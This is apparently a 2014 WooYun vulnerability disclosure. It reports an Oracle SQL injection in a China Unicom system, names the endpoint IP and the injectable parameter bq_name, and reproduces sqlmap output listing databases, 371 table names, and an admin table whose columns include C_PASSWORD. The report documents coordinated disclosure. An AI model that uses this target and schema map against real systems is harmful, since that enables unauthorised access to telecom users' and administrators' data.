Vulnerability summary

Defect ID: wooyun-2014-074813

Title: Data leak in a China Unicom system (Oracle string-type SQL injection)

Affected vendor: China Unicom (中国联通)

Author: diguoji

Submitted: 2014-09-03 09:52

Fix time: 2014-10-18 09:54

Public disclosure: 2014-10-18 09:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2014-09-03: Details sent to the vendor; awaiting vendor handling
2014-09-08: Vendor has confirmed; details disclosed to the vendor only
2014-09-18: Details disclosed to core white hats and domain experts
2014-09-28: Details disclosed to regular white hats
2014-10-08: Details disclosed to intern white hats
2014-10-18: Details disclosed to the public

Brief description:

The current schema holds 371 tables; cross-schema access is possible. Oracle string-type SQL injection via a string parameter.

Detailed description:

Test URL (the injectable parameter is bq_name): http://123.125.99.115//getSource.jsp?bq_name=-1

(Screenshots 1.png, 2.png and 3.png from the original report are not reproduced here.)

Proof of vulnerability (sqlmap output):

available databases [8]:
[*] BQDX
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] ZXPT
current schema (equivalent to database on Oracle): 'BQDX'
Database: BQDX
[371 tables]
+--------------------------------+
| ADDRESS_BAK |
| ADDRESS_GROUP |
| ADDRESS_GROUP_BAK |
| ADDRESS_GROUP_DQDX |
| ADDRESS_GROUP_DXHZ |
| ADDRESS_GROUP_DXQM |
| ADDRESS_LIST |
| ADDRESS_LIST_BAK |
| ADDRESS_LIST_BJHZ |
| ADDRESS_LIST_DQDX |
| ADDRESS_LIST_DXQM |
| ADDRESS_TEMP |
| ALERT_LOG |
| ALERT_LOG_DISK |
| BOOK_ERR_MO_ALL |
| BOOK_ERR_MO_FX |
| BOOK_ERR_MO_FX20100621 |
| BOOK_ERR_MO_FX_LOG |
| BOOK_SHIELD |
| BOOK_WZ_HMD |
| BOOK_WZ_TACL |
| BOOK_WZ_TSLX |
| BOOK_WZ_YQLX |
| BQDX_WBQM_COMFIG |
| BQ_THREE_TYPE |
| BRANCHOFFICE_INFO |
| DEPARTMENT_ADDRESS_LIST |
| DEPARTMENT_ADMIN |
| DEPARTMENT_DEAL_LOG |
| DEPARTMENT_LOG |
| DEPARTMENT_MENU |
| DEPARTMENT_ROLE |
| DISK_INFO |
| DXCC_FILTER_TIME |
| DXCC_PRIVATE |
| DXCC_SMS_SEARCH |
| DXCC_USER_BLACKLIST |
| DXFHQ |
| DXFHQ_FILTER_TIME |
| DXFHQ_FILTER_WORD |
| DXFHQ_SMS_FIRE |
| DXFHQ_SPECIAL_NUM |
| DXFHQ_USER_BLACKLIST |
| DXHY_CONTENT |
| DXHY_GROUP |
| DXHY_GROUP_CONTENT |
| DXHY_LINKMAN |
| DXHY_LXR_CONTENT |
| DXHY_PRIVATE |
| DXHY_STATE |
| DXHZ_SUBMIT_EXT |
| DXQM_CONTENT |
| DXQM_GROUP |
| DXQM_LINKMAN |
| DXQM_PRIVATE |
| DXQM_WEIBO_GBHISTORY |
| DXZY_FILTER |
| DXZY_PRIVATE |
| DXZY_SMS |
| EMP_CONTACT |
| EMP_EPBASE_INFO |
| EMP_ERROR_MESSAGE |
| EMP_GJZ_FILTER |
| EMP_MEDIA_DXQM |
| EMP_PKGSER_INOUT |
| EMP_PKGSER_SELECT |
| EMP_SEND_PWD |
| EMP_SEND_PWD_LOG |
| EMP_SEND_PWD_REPORT |
| EMP_SSI_PROCESS_LOG |
| EMP_SSI_PROCESS_LOG_0209 |
| EMP_SSI_PROCESS_LOG_AUTOBAK |
| EMP_SSI_PROCESS_LOG_BAK |
| EMP_SSI_PROCESS_LOG_NEW |
| EMP_USERORDER_INFO |
| EMP_USER_INFOR_ZC |
| EMP_USER_INFOR_ZX |
| EMP_USER_SHIELD |
| EMP_WEIBO_URL |
| EMP_YJDR_GL |
| E_CALENDAR |
| E_CALENDAR_ADMIN |
| E_CLASS |
| E_COLLECTION |
| E_KNOWLEDGE |
| E_MOBILE |
| E_NOTICE |
| E_NOTICE_MATH |
| E_REPLY |
| E_SPACE_ARTICLE |
| E_SPACE_COMMENT |
| FILTER_TIME |
| FILTER_WORD |
| GROUP_DEPARTMENT_INFO |
| HEADOFFICE_INFO |
| HLJ_TYYH |
| HZNUM_DXHZ |
| INTERFACE_PROGRAM |
| INTERFACE_PROGRAM_CONFIG |
| JG_HFY |
| JG_LOGOUSER_TYPE |
| JG_MT_FEE_COUNT_HJ |
| JG_MT_FEE_COUNT_MX |
| JG_MT_FEE_COUNT_PC |
| JG_MT_FEE_ROLE |
| JG_MT_FEE_SPEC_TEMP |
| JIERI |
| JIERI_BQ |
| JIFEN_MESSAGE_PROCESS1 |
| JIFEN_MESSAGE_PROCESS1_RONG |
| JIFEN_MESSAGE_PROCESS1_TMP |
| JIFEN_MESSAGE_PROCESS1_TMP_BAK |
| JIFEN_MESSAGE_PROCESS2 |
| JIFEN_MESSAGE_PROCESS20623 |
| JIFEN_MESSAGE_PROCESS20623_END |
| JIFEN_PROCESS_BAK_ZY |
| JIXI_PINGBI |
| LNBQDX_USER |
| LNBQDX_USER_0616_ZY |
| MESSAGE_PUSH |
| MESSAGE_PUSH_LOG |
| MOBILE_0520 |
| MOBILE_0520_LY |
| MOBILE_HD0513 |
| MSG_ZF |
| MSG_ZF_DETAIL |
| PASSWORDFIND |
| PRIVATE_BQDX |
| PRIVATE_DXCC |
| PRIVATE_DXFHQ |
| PRIVATE_DXHZ |
| PRIVATE_DXQM |
| PRIVATE_DXZY |
| PRIVATE_KHTXL |
| PRIVATE_QYTXL |
| PRIVATE_USER |
| PRIVATE_ZDHF |
| PRODUCT_ANSWERCP |
| PRODUCT_INFOCP |
| QMWB_ACTIVATE_SENDWB |
| QMWX_BASIC_USER_40 |
| QMWX_BASIC_USER_40_LOG |
| REPLIESLANGUAGE |
| SDYY_DGTD |
| SDYY_DGTD_TYPE |
| SDYY_SPLENDIDSMS |
| SDYY_WZ_GG |
| SDYY_WZ_HBD |
| SDYY_WZ_HBDLX |
| SDYY_WZ_HDYJ |
| SDYY_WZ_HMD |
| SDYY_WZ_LOG |
| SDYY_WZ_MANAGE |
| SDYY_WZ_MENU |
| SDYY_WZ_MENU20100422 |
| SDYY_WZ_MOBILE |
| SDYY_WZ_NET |
| SDYY_WZ_PRO |
| SDYY_WZ_QD |
| SDYY_WZ_QDLX |
| SDYY_WZ_ROLE |
| SDYY_WZ_YWLX |
| SDYY_WZ_YWXX |
| SDYY_WZ_YW_YXCJ |
| SDY_BQDX_DS_TP |
| SDY_EMP_ALLRW_CL |
| SDY_EMP_AREA |
| SDY_EMP_AREA_BAK |
| SDY_EMP_BQ |
| SDY_EMP_BQ1 |
| SDY_EMP_BQ20100424 |
| SDY_EMP_BQ20100615 |
| SDY_EMP_BQCJ |
| SDY_EMP_BQDY |
| SDY_EMP_BQDY_SHTG |
| SDY_EMP_BQFS |
| SDY_EMP_BQFS_LOG |
| SDY_EMP_BQGJZ |
| SDY_EMP_BQGJZ1 |
| SDY_EMP_BQGJZ_BAK_ZY_20100420 |
| SDY_EMP_BQGZ |
| SDY_EMP_BQLY |
| SDY_EMP_BQPL |
| SDY_EMP_BQPP |
| SDY_EMP_BQSC |
| SDY_EMP_BQTYPE |
| SDY_EMP_BQXSD |
| SDY_EMP_BQ_BAK |
| SDY_EMP_CALLBOARD |
| SDY_EMP_CITY |
| SDY_EMP_CL |
| SDY_EMP_COLL |
| SDY_EMP_COLL_LOG |
| SDY_EMP_CONTENT_LIB |
| SDY_EMP_CWTYPE |
| SDY_EMP_CX |
| SDY_EMP_DQDYLOG |
| SDY_EMP_DSH |
| SDY_EMP_DSH_SHTG |
| SDY_EMP_DS_ALLSH |
| SDY_EMP_DXFS |
| SDY_EMP_FRIEND |
| SDY_EMP_FRIEND_LOG |
| SDY_EMP_GJZ |
| SDY_EMP_GJZCD |
| SDY_EMP_GJZFD |
| SDY_EMP_GROUP |
| SDY_EMP_GROUPBQ |
| SDY_EMP_JFGZ |
| SDY_EMP_JP |
| SDY_EMP_JP_FF |
| SDY_EMP_LEVEL |
| SDY_EMP_LOG |
| SDY_EMP_LS |
| SDY_EMP_LS20100628_1 |
| SDY_EMP_MAIL |
| SDY_EMP_MATCH |
| SDY_EMP_NSH |
| SDY_EMP_OPLOG |
| SDY_EMP_PLAN |
| SDY_EMP_PM |
| SDY_EMP_PM_CS |
| SDY_EMP_PM_LOG |
| SDY_EMP_PROVINCE |
| SDY_EMP_QF |
| SDY_EMP_QFCITY |
| SDY_EMP_QFTJ |
| SDY_EMP_QF_ZY_TEMP |
| SDY_EMP_QUESTION |
| SDY_EMP_ROLE |
| SDY_EMP_RW |
| SDY_EMP_RWTYPE |
| SDY_EMP_RWYWC |
| SDY_EMP_RW_LQ |
| SDY_EMP_SJSP |
| SDY_EMP_TALK |
| SDY_EMP_TCYH |
| SDY_EMP_TY |
| SDY_EMP_TYBQ |
| SDY_EMP_UPDATE |
| SDY_EMP_USERDT |
| SDY_EMP_USERINFO |
| SDY_EMP_USERINFO20100628 |
| SDY_EMP_USERINFO20100628_1 |
| SDY_EMP_USERINFO_FWG |
| SDY_EMP_USERINFO_LS_OLD |
| SDY_EMP_USERLY |
| SDY_EMP_USERRW |
| SDY_EMP_USERRW_LOG |
| SDY_EMP_USERTYPE |
| SDY_EMP_USERYW |
| SDY_EMP_USERZX |
| SDY_EMP_USER_LS |
| SDY_EMP_WRITE |
| SDY_EMP_WTJD |
| SDY_EMP_WZ |
| SDY_EMP_WZCC |
| SDY_EMP_XCY |
| SDY_EMP_XZ |
| SDY_EMP_YGPP |
| SDY_EMP_YHCH |
| SDY_EMP_YHCH_LOG |
| SDY_EMP_YHCH_SHTG |
| SDY_EMP_YW |
| SDY_EMP_YXJ |
| SDY_EMP_ZDYFS |
| SDY_EMP_ZS |
| SDY_HELPCONTENT |
| SDY_WZ_CJP |
| SDY_WZ_JDTJ_COUNT |
| SDY_WZ_MYFRIEND |
| SDY_WZ_MYQUNFRIEND |
| SDY_WZ_QUN |
| SDY_WZ_SR_COUNT |
| SDY_WZ_SXXXX_COUNT |
| SDY_WZ_SX_COUNT |
| SDY_WZ_SX_COUNT_FZ |
| SDY_WZ_XX_COUNT |
| SDY_WZ_XX_COUNT20100516 |
| SDY_WZ_XX_COUNT_FZ |
| SDY_WZ_XX_COUNT_ZHI |
| SDY_WZ_YHZX_COUNT |
| SDY_WZ_YTJ_COUNT |
| SDY_WZ_YWFG_COUNT |
| SDY_WZ_YWFG_COUNT20100516 |
| SDY_WZ_YWSY_COUNT |
| SERPKGBASE_INFO |
| SERVICE_SYNC_LOG |
| SERVICE_SYNC_SERVER |
| SGIP_MO_LOG |
| SGIP_MT |
| SGIP_MT_FEE |
| SGIP_MT_FEEL |
| SGIP_MT_LOG |
| SGIP_MT_REPORT |
| SHOR_URL |
| SMS_BQDX_BROWSE |
| SMS_BQDX_KU |
| SMS_BQDX_SUM |
| SMS_BQDX_USER |
| SMS_CONFIG |
| SMS_DXCC_BROWSE |
| SMS_DXCC_LAB |
| SMS_DXCC_LABL |
| SMS_DXCC_LABLX |
| SMS_DXCC_SUM |
| SMS_DXHZ |
| SMS_DXHZ_CONTENT |
| SMS_DXQM |
| SMS_DXZY |
| SMS_FIRE |
| SMS_MFTY_LAB |
| SMS_MFTY_LABLX |
| SMS_MOBLIE_NO |
| SMS_ORDER_USERINFO |
| SMS_RECORD_LOG |
| SMS_SEARCH |
| SMS_SECTIONNO |
| SMS_SECTIONNO_ERR |
| SMS_USERINFO |
| SMS_USERINFO_LOG |
| SMS_USERINFO_TYPE |
| SMS_USERINFO_TYPE_ZX |
| SM_HB_0615 |
| SM_HB_0615_15_50 |
| SM_HB_0615_50UP |
| SM_HB_0615_MGYH |
| SYSTEM_INFO |
| SYSTEM_INFO_ERRDESC |
| TABLES0614 |
| TABLE_INFO_TEST |
| TABLE_NAME_TEMP_ZY |
| TABLE_SPACE_INFO |
| TEMP1 |
| TEMP2 |
| TEST_BACKUP |
| TEST_BACKUP_BAK |
| TIAOJIANBIAO |
| TONGYONG_BQ |
| UPLOADFILE |
| USERNAME |
| USER_BLACKLIST |
| USER_INFO |
| USER_IPHONEORANDRIO |
| USER_IPHONEORANDRIO_BAK |
| USER_ORDER_INFO |
| USER_PHONE_REGISTER |
| YAN_0520 |
| YBYAA |
| YBY_0509 |
| YBY_0614BD |
| YBY_0614GW |
| YBY_HEIHE0903 |
| YBY_JMSPP0107 |
| YBY_QQHE3000 |
| YBY_SHTIYAN3000 |
| YBY_ZTYW1122 |
| ZDYD_HOLIDAY_CONFIG |
| ZDYD_REPLY_CONTENT |
| ZDYD_REPLY_COUNT |
| ZDYD_SCENE_TYPE |
| ZDYD_USER_CONFIG |
| ZDYD_USER_CONFIG_EL |
| ZDYD_USER_SENCE |
| ZXPT_JCXX_TYPEATT |
| ZXPT_JXCC_TYPEATT |
| ZXPT_MFTY_BQDX |
| ZZZ_JIFEN_PROCESS10623FX_END |
| ZZZ_USER_HF_0623_FX_WC |
| ZZ_WANGCHANG_71 |
| ZZ_WANGCHAO_HF |
+--------------------------------+
Database: BQDX
Table: DEPARTMENT_ADMIN
[13 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| BRANCHID | NUMBER |
| C_CREATEUSER | VARCHAR2 |
| C_DEL_FLAG | VARCHAR2 |
| C_MOBILE | VARCHAR2 |
| C_NAME | VARCHAR2 |
| C_PASSWORD | VARCHAR2 |
| C_SUMMARY | VARCHAR2 |
| C_USERTYPE | VARCHAR2 |
| D_DATE | VARCHAR2 |
| DAPARTID | NUMBER |
| N_HEADOFFICE_ID | NUMBER |
| N_ID | NUMBER |
| N_TYPE | NUMBER |
+-----------------+----------+
Database: CTXSYS
[3 tables]
+---------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
+---------------------+
Database: EXFSYS
[1 table]
+----------------+
| RLM$PARSEDCOND |
+----------------+
Database: MDSYS
[37 tables]
+--------------------------------+
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_COORD_OP_PARAM_USE |
| SDO_COORD_OP_PARAM_VALS |
| SDO_COORD_OP_PATHS |
| SDO_COORD_REF_SYS |
| SDO_COORD_SYS |
| SDO_CS_SRS |
| SDO_DATUMS |
| SDO_DATUMS_OLD_SNAPSHOT |
| SDO_ELLIPSOIDS |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT |
| SDO_GEOR_PLUGIN_REGISTRY |
| SDO_GEOR_XMLSCHEMA_TABLE |
| SDO_GR_MOSAIC_0 |
| SDO_GR_MOSAIC_1 |
| SDO_GR_MOSAIC_2 |
| SDO_GR_MOSAIC_3 |
| SDO_GR_RDT_1 |
| SDO_PREFERRED_OPS_SYSTEM |
| SDO_PREFERRED_OPS_USER |
| SDO_PRIME_MERIDIANS |
| SDO_PROJECTIONS_OLD_SNAPSHOT |
| SDO_ST_TOLERANCE |
| SDO_TOPO_DATA$ |
| SDO_TOPO_RELATION_DATA |
| SDO_TOPO_TRANSACT_DATA |
| SDO_TXN_IDX_DELETES |
| SDO_TXN_IDX_EXP_UPD_RGN |
| SDO_TXN_IDX_INSERTS |
| SDO_UNITS_OF_MEASURE |
| SDO_XML_SCHEMAS |
+--------------------------------+
Database: OLAPSYS
[2 tables]
+--------------------+
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |

Fix recommendation:

(none given by the author)

Copyright notice: when reposting, please credit the source: diguoji@WooYun (乌云)

Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2014-09-08 09:33

Vendor reply:

Latest status:

None yet